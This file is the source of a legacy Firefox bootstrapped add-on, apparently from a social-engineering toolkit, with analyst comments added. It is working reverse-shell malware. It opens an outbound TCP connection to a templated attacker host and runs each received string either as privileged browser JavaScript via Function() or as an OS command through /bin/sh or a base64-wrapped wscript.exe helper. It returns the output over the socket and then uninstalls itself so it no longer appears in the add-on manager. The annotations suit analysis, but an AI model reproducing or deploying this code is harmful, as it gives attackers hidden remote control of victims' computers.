Path: blob/master/modules/social_engineering/firefox_extension_reverse_shell/extension/bootstrap.js
/**
 * Entry point of a legacy bootstrapped Firefox add-on (bootstrap.js).
 *
 * What the visible code does, in order:
 *   1. builds a path to the add-on's own folder under the profile,
 *   2. opens an outbound TCP connection to a templated host/port and wires
 *      every inbound chunk to runCmd(), writing the result back on the socket,
 *   3. asks the add-on manager to uninstall the add-on.
 *
 * Analyst notes (all values are taken from this file):
 *   - Fixed add-on id: {861fb387-92ce-bb0a-cb48-4b923dbc292b}
 *   - Fixed temp-file names in TmpD: 7kZuA4kPoh2HzVagS.js (Windows only) and
 *     7tDzOIHbP3vzglqB (command output). Both are deleted after use, so they
 *     are short-lived on disk.
 *   - Child processes are started from the browser process:
 *     C:\Windows\System32\wscript.exe on Windows, /bin/sh elsewhere.
 *   - The code depends on Components.classes / chrome privileges, i.e. on the
 *     legacy add-on model; WebExtensions do not expose these interfaces.
 *
 * @param data   bootstrap data object passed by the add-on manager (unused here)
 * @param reason bootstrap reason code passed by the add-on manager (unused here)
 */
function startup(data, reason) {
  // <profile>/extensions/<guid>. The resulting nsIFile is never read again in
  // this function.
  var file = Components.classes["@mozilla.org/file/directory_service;1"].
    getService(Components.interfaces.nsIProperties).
    get("ProfD", Components.interfaces.nsIFile);
  file.append("extensions");
  // Assigned without `var`, so this becomes an implicit global in the
  // bootstrap scope; the uninstall code at the bottom reads it.
  xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";
  file.append(xpi_guid);

  // Generated payload body; original marker: # ./msfpayload firefox/shell_reverse_tcp
  (function(){
    Components.utils.import("resource://gre/modules/NetUtil.jsm");
    // Template placeholders, presumably substituted by whatever builds the
    // extension. `port` is unquoted, so until replaced it is just an
    // undeclared identifier.
    var host = '__reverse_shell_host_placeholder__';
    var port = __reverse_shell_port_placeholder__;

    // Outbound connection. No socket type is requested (null, 0), which looks
    // like a plain, unencrypted TCP transport — NOTE(review): confirm; if so,
    // commands and output are visible to network inspection.
    var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
      .getService(Components.interfaces.nsISocketTransportService);
    var socket = socketTransport.createTransport(null, 0, host, port, null);
    var outStream = socket.openOutputStream(0, 0, 0);
    var inStream = socket.openInputStream(0, 0, 0);

    // The pump delivers inbound data to `listener` once asyncRead() is called
    // at the end of this closure.
    var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
      .createInstance(Components.interfaces.nsIInputStreamPump);
    pump.init(inStream, -1, -1, 0, 0, true);

    var listener = {
      onStartRequest: function(request, context) {},
      onStopRequest: function(request, context) {},
      // Each inbound chunk is trimmed and treated as one complete command;
      // there is no framing or reassembly across chunks.
      onDataAvailable: function(request, context, stream, offset, count) {
        var data = NetUtil.readInputStreamToString(stream, count).trim();
        // runCmd is declared with `var` further down; it is assigned by the
        // time data can arrive because asyncRead() runs last.
        runCmd(data, function(err, output) {
          // Errors are dropped: nothing is written back when err is set.
          if (!err) outStream.write(output, output.length);
        });
      }
    };

    // Reads the whole file at `path` into a byte-per-character string and then
    // deletes the file. Any exception yields "".
    var readFile = function(path) {
      try {
        var file = Components.classes["@mozilla.org/file/local;1"]
          .createInstance(Components.interfaces.nsILocalFile);
        file.initWithPath(path);

        var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
          .createInstance(Components.interfaces.nsIFileInputStream);
        fileStream.init(file, 1, 0, false);

        var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
          .createInstance(Components.interfaces.nsIBinaryInputStream);
        binaryStream.setInputStream(fileStream);
        var array = binaryStream.readByteArray(fileStream.available());

        binaryStream.close();
        fileStream.close();
        // Output file is removed as soon as it has been read.
        file.remove(true);

        return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
      } catch (e) { return ""; }
    };


    // Local stand-in for window.setTimeout built on a one-shot nsITimer.
    // Every caller in this file omits `delay`, so it arrives as undefined —
    // presumably treated as 0 by the timer; confirm.
    var setTimeout = function(cb, delay) {
      var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
      timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
      return timer;
    };


    // Platform detection is done on the User-Agent string only.
    var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
      .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
    var windows = (ua.indexOf("Windows")>-1);
    // Imported module scope; used below only for svcs.btoa().
    var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
    // Windows Script Host helper source: base64-decodes its first argument via
    // MSXML2/ADODB.Stream and passes the result to WScript.Shell.Run with
    // window style 0 and wait = true.
    var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;
    // Dispatches one received command string and reports through
    // cb(err, output). Two modes: a [JAVASCRIPT]...[/JAVASCRIPT] wrapper is
    // evaluated inside the browser; anything else goes to the OS shell.
    var runCmd = function(cmd, cb) {
      cb = cb || (function(){});

      if (cmd.trim().length == 0) {
        setTimeout(function(){ cb("Command is empty string ('')."); });
        return;
      }

      var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
      if (js) {
        var tag = "[!JAVASCRIPT]";
        // `sync` is true only while the received code is still executing
        // inside Function(); a send() during that window is deferred through
        // the timer so cb never fires synchronously ("avoid zalgo's reach").
        var sync = true;
        var sent = false;
        var retVal = null;

        try {
          // NOTE(review): Function() compiles network-supplied text and runs
          // it in this add-on's privileged scope. Only the first send() call
          // is honoured; a falsy value marks the reply as sent but writes
          // nothing.
          retVal = Function('send', js[1])(function(r){
            if (sent) return;
            sent = true
            if (r) {
              if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
              else cb(false, r+tag+"\n");
            }
          });
        } catch (e) { retVal = e.message; }

        sync = false;

        // Fall back to the return value (or the exception message) when the
        // code did not call send() itself.
        if (retVal && !sent) {
          sent = true;
          setTimeout(function(){ cb(false, retVal+tag+"\n"); });
        }

        return;
      }

      // Shell mode. shEsc is a String.replace() replacement pattern: each
      // non-word character matched by /\W/g is re-emitted with an escape
      // character in front ("$&" is the matched text).
      var shEsc = "\\$&";
      var shPath = "/bin/sh -c"

      if (windows) {
        shPath = "cmd /c";
        shEsc = "\^$&";
        // Drop the WSH helper into TmpD under a fixed name.
        var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
          .getService(Components.interfaces.nsIProperties)
          .get("TmpD", Components.interfaces.nsIFile);
        jscriptFile.append('7kZuA4kPoh2HzVagS.js');
        var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
          .createInstance(Components.interfaces.nsIFileOutputStream);
        // 0x04 | 0x08 | 0x20 are NSPR open flags (read-write, create,
        // truncate); 0666 is a legacy octal permission literal.
        stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
        stream.write(jscript, jscript.length);
        if (stream instanceof Components.interfaces.nsISafeOutputStream) {
          stream.finish();
        } else {
          stream.close();
        }
      }

      // Command output is captured by redirecting into this fixed-name file
      // in TmpD; readFile() deletes it after reading.
      var stdoutFile = "7tDzOIHbP3vzglqB";

      var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
        .getService(Components.interfaces.nsIProperties)
        .get("TmpD", Components.interfaces.nsIFile);
      stdout.append(stdoutFile);

      // Build the final command line: the command is prefixed with shPath,
      // escaped, prefixed again, and stdout/stderr are redirected to the
      // output file. On Windows the whole line is base64-encoded for the WSH
      // helper; elsewhere the raw command is escaped once more beforehand.
      if (windows) {
        var shell = shPath+" "+cmd;
        shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
        var b64 = svcs.btoa(shell);
      } else {
        var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
        shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
      }
      var process = Components.classes["@mozilla.org/process/util;1"]
        .createInstance(Components.interfaces.nsIProcess);
      var sh = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);

      if (windows) {
        // Browser process -> wscript.exe <TmpD>\7kZuA4kPoh2HzVagS.js <base64>
        sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
        process.init(sh);
        var args = [jscriptFile.path, b64];
        // First argument true = blocking: run() returns after the child exits.
        process.run(true, args, args.length);
        // Helper script is removed right after the child returns.
        jscriptFile.remove(true);
        // The Windows reply echoes the command ahead of its output.
        setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
      } else {
        // Browser process -> /bin/sh -c <command line>
        sh.initWithPath("/bin/sh");
        process.init(sh);
        var args = ["-c", shell];
        process.run(true, args, args.length);
        setTimeout(function(){cb(false, readFile(stdout.path));});
      }
    };


    // Start delivering socket data to the listener.
    pump.asyncRead(listener, null);
  })();


  // Self-removal: the add-on asks to be uninstalled immediately after the
  // channel has been set up, so it may not remain listed in the add-on
  // manager. Nothing in this function closes the socket; the connection
  // presumably stays open for the life of the browser process — confirm
  // against the Firefox version in scope. Failures in both paths are
  // swallowed.

  try { // Fx < 4.0: legacy extension manager
    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
  } catch (e) {}
  try { // Fx 4.0 and later: AddonManager
    Components.utils.import("resource://gre/modules/AddonManager.jsm");
    AddonManager.getAddonByID(xpi_guid, function(addon) {
      addon.uninstall();
    });
  } catch (e) {}
}